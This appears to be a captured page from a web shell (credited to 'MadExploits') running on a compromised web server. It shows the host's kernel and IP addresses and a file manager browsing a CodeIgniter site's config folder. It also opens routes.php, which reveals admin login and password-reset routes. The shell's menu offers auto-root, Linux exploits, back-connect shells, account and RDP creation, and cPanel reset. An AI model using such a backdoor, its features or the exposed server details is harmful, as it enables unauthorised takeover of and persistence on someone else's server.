Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.117.254.203
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
asd /
application /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
autoload.php
4.01
KB
-rw-r--r--
config.php
2.06
KB
-rw-r--r--
constants.php
4.52
KB
-rw-r--r--
database.php
690
B
-rw-r--r--
doctypes.php
2.38
KB
-rw-r--r--
email.php
328
B
-rw-r--r--
foreign_chars.php
3.16
KB
-rw-r--r--
hooks.php
417
B
-rw-r--r--
index.html
131
B
-rw-r--r--
memcached.php
498
B
-rw-r--r--
migration.php
2.96
KB
-rw-r--r--
mimes.php
10.01
KB
-rw-r--r--
profiler.php
477
B
-rw-r--r--
routes.php
1.16
KB
-rw-r--r--
smileys.php
3.11
KB
-rw-r--r--
user_agents.php
6.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : routes.php
<?php defined('BASEPATH') or exit('No direct script access allowed'); $route['default_controller'] = 'Home'; $route['404_override'] = ''; $route['translate_uri_dashes'] = FALSE; $route['su-login'] = 'Home/login'; $route['authenticate-superuser'] = 'Home/authenticateSuperUser'; $route['clear-remember-me'] = 'Home/clearRememberMe'; // Admin Password Reset Routes $route['admin-forget-password'] = 'Home/forgetPassword'; $route['process-admin-forget-password'] = 'Home/forgetPasswordProcess'; $route['authenticate-token/(:any)'] = 'Home/authenticateToken/$1'; $route['process-new-password'] = 'Home/processNewPassword'; $route['admin'] = 'Admin'; $route['admin/createPost'] = 'Admin/createPost'; $route['admin/logout'] = 'Admin/logout'; $route['avatar'] = 'Avatar'; $route['projects'] = 'Projects'; $route['projects/(:any)'] = 'Projects/details/$1'; $route['privacy-policy'] = 'Privacy'; $route['terms-and-conditions'] = 'TermsConditions'; $route['contact-us'] = 'Home/contact'; $route['process-contact'] = 'Home/processContact'; $route['account'] = 'Customer'; $route['authenticate-account'] = 'Customer/authenticateUser'; $route['revoke-authentication'] = 'Customer/logout';
Close